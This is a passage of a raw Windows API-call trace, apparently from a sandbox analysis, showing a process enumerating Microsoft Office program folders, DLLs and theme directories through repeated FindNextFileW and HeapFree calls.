ftLastAccessTime.dwLowDateTime=0x24bcc96d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24bcc96d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DataModel", cAlternateFileName="DATAMO~1")) returned 1 [0169.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.244] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17e0c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AnalysisServices.Common.dll", cAlternateFileName="MI1312~1.DLL")) returned 1 [0169.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0169.245] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4befc00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0169.245] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0169.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.245] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x447d6b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x447d6b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a38de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c190, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Spatial.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0169.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.245] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2803429, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2803429, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0169.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.245] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x26a58c7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77e88, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0169.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.247] FindNextFileW (in: hFindFile=0x727988, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef915def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8f6526, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 0 [0169.247] FindClose (in: hFindFile=0x727988 | out: hFindFile=0x727988) returned 1 [0169.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.247] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0fbc434, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0fbc434, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf10a1263, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0169.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8d02b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8d02b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0169.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc576616a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0169.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.251] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc62081b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1bac0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0169.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.252] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0169.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.252] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cec0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0169.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.252] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0ed7602, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0ed7602, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0ed7602, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0169.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.253] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5f76153, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEXTCONV", cAlternateFileName="")) returned 1 [0169.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0169.253] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES16", cAlternateFileName="")) returned 1 [0169.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.605] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0169.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.606] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="AXIS", cAlternateFileName="")) returned 1 [0169.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.606] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a96da3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a96da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0169.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.606] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a70c44, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a70c44, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0169.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.607] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0169.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.607] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0169.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.608] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0169.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.608] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CANYON", cAlternateFileName="")) returned 1 [0169.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.610] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0169.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.611] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0169.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.612] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0169.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.614] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0169.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.615] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0169.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.616] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECHO", cAlternateFileName="")) returned 1 [0169.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.618] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0169.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.619] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EDGE", cAlternateFileName="")) returned 1 [0169.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.620] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0169.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.621] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0169.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.623] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ICE", cAlternateFileName="")) returned 1 [0169.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.625] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="INDUST", cAlternateFileName="")) returned 1 [0169.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.626] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b7bb91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b7bb91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="IRIS", cAlternateFileName="")) returned 1 [0169.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.627] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0169.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.628] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, 